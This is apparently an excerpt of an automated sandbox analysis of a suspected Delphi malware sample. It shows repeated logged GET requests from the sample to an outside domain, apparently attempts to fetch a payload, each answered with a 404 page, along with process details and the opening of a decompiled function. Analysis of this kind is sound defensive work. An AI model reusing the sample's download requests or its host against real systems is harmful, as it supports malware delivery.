69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:17:58.413938046 CEST	2297	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:17:58.447000980 CEST	2298	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:17:58 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:18:08.394927979 CEST	2305	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:18:08.428872108 CEST	2306	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:18:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:18:19.080457926 CEST	2307	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:18:19.114404917 CEST	2308	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:18:19 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:18:28.416295052 CEST	2308	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:18:28.450485945 CEST	2309	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:18:28 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: r096teIe1H.exePID: 6876, Parent PID: 3524

General

Target ID:	0
Start time:	20:15:26
Start date:	23/08/2023
Path:	C:\Users\user\Desktop\r096teIe1H.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\r096teIe1H.exe
Imagebase:	0x400000
File size:	1'053'184 bytes
MD5 hash:	B1E794E29881F56A4E9AFA213D7C622D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: r096teIe1H.exePID: 6876, Parent PID: 3524COMMON

Executed Functions

Function 0327D8B0 Relevance: 200.7, APIs: 12, Strings: 99, Instructions: 6431
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0327D8B0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				intOrPtr _v156;
				char _v160;
				char _v164;
				char _v168;
				intOrPtr _v172;
				char _v176;
				char _v180;
				char _v184;
				intOrPtr _v188;
				char _v192;
				char _v196;
				char _v200;
				intOrPtr _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				intOrPtr _v240;
				char _v244;
				char _v248;
				char _v252;
				intOrPtr _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				char _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				char _v592;
				char _v596;
				intOrPtr _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				intOrPtr _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				char _v664;
				char _v668;
				intOrPtr _v672;
				char _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				char _v784;
				intOrPtr _v788;
				char _v792;
				char _v796;
				char _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				char _v816;
				char _v820;
				intOrPtr _v824;
				char _v828;
				char _v832;
				char _v836;
				intOrPtr _v840;
				char _v844;
				char _v848;
				char _v852;
				intOrPtr _v856;
				char _v860;
				char _v864;
				char _v868;
				intOrPtr _v872;
				char _v876;
				char _v880;
				char _v884;
				intOrPtr _v888;
				char _v892;
				char _v896;
				char _v900;
				intOrPtr _v904;
				char _v908;
				char _v912;
				char _v916;
				intOrPtr _v920;
				char _v924;
				char _v928;
				char _v932;
				intOrPtr _v936;
				char _v940;
				char _v944;
				char _v948;
				char _v952;
				char _v956;
				char _v960;
				char _v964;
				char _v968;
				intOrPtr _v972;
				char _v976;
				char _v980;
				char _v984;
				intOrPtr _v988;
				char _v992;
				char _v996;
				char _v1000;
				intOrPtr _v1004;
				char _v1008;
				char _v1012;
				char _v1016;
				intOrPtr _v1020;
				char _v1024;
				char _v1028;
				char _v1032;
				intOrPtr _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1076;
				char _v1080;
				intOrPtr _v1084;
				char _v1088;
				char _v1092;
				char _v1096;
				intOrPtr _v1100;
				char _v1104;
				char _v1108;
				_Unknown_base(*)()* _v1112;
				char _v1116;
				intOrPtr _v1120;
				char _v1124;
				char _v1128;
				char _v1132;
				intOrPtr _v1136;
				char _v1140;
				char _v1144;
				char _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				intOrPtr _v1172;
				char _v1176;
				char _v1180;
				char _v1184;
				intOrPtr _v1188;
				char _v1192;
				char _v1196;
				char _v1200;
				intOrPtr _v1204;
				char _v1208;
				char _v1212;
				char _v1216;
				intOrPtr _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				intOrPtr _v1236;
				char _v1240;
				char _v1244;
				char _v1248;
				intOrPtr _v1252;
				char _v1256;
				char _v1260;
				char _v1264;
				intOrPtr _v1268;
				char _v1272;
				char _v1276;
				char _v1280;
				char _v1284;
				intOrPtr _v1288;
				char _v1292;
				char _v1296;
				char _v1300;
				intOrPtr _v1304;
				char _v1308;
				char _v1312;
				char _v1316;
				intOrPtr _v1320;
				char _v1324;
				char _v1328;
				char _v1332;
				intOrPtr _v1336;
				char _v1340;
				char _v1344;
				char _v1348;
				char _v1352;
				intOrPtr _v1356;
				char _v1360;
				char _v1364;
				char _v1368;
				intOrPtr _v1372;
				char _v1376;
				char _v1380;
				char _v1384;
				intOrPtr _v1388;
				char _v1392;
				char _v1396;
				char _v1400;
				intOrPtr _v1404;
				char _v1408;
				char _v1412;
				char _v1416;
				char _v1420;
				char _v1424;
				intOrPtr _v1428;
				char _v1432;
				char _v1436;
				char _v1440;
				intOrPtr _v1444;
				char _v1448;
				char _v1452;
				char _v1456;
				intOrPtr _v1460;
				char _v1464;
				char _v1468;
				char _v1472;
				intOrPtr _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				intOrPtr _v1492;
				char _v1496;
				char _v1500;
				char _v1504;
				intOrPtr _v1508;
				char _v1512;
				char _v1516;
				char _v1520;
				char _v1524;
				intOrPtr _v1528;
				char _v1532;
				char _v1536;
				char _v1540;
				intOrPtr _v1544;
				char _v1548;
				char _v1552;
				char _v1556;
				char _v1560;
				intOrPtr _v1564;
				char _v1568;
				char _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				char _v1588;
				char _v1592;
				intOrPtr _v1596;
				char _v1600;
				char _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				char _v1620;
				char _v1624;
				intOrPtr _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _v1644;
				char _v1648;
				char _v1652;
				char _v1656;
				intOrPtr _v1660;
				char _v1664;
				intOrPtr _v1668;
				char _v1672;
				char _v1676;
				char _v1680;
				intOrPtr _v1684;
				char _v1688;
				char _v1692;
				char _v1696;
				intOrPtr _v1700;
				char _v1704;
				char _v1708;
				intOrPtr _v1712;
				char _v1716;
				intOrPtr _v1720;
				char _v1724;
				char _v1728;
				char _v1732;
				intOrPtr _v1736;
				char _v1740;
				char _v1744;
				char _v1748;
				intOrPtr _v1752;
				char _v1756;
				char _v1760;
				char _v1764;
				char _v1768;
				char _v1772;
				char _v1776;
				char _v1780;
				intOrPtr _v1784;
				char _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v1800;
				intOrPtr _v1804;
				char _v1808;
				char _v1812;
				char _v1816;
				intOrPtr _v1820;
				char _v1824;
				char _v1828;
				char _v1832;
				intOrPtr _v1836;
				char _v1840;
